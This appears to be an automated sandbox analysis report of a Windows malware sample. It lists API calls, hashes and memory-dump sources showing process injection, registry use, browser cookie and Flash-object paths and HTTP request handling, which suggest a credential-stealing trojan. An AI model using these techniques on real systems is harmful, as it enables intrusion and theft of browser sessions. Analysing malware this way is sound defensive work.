  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
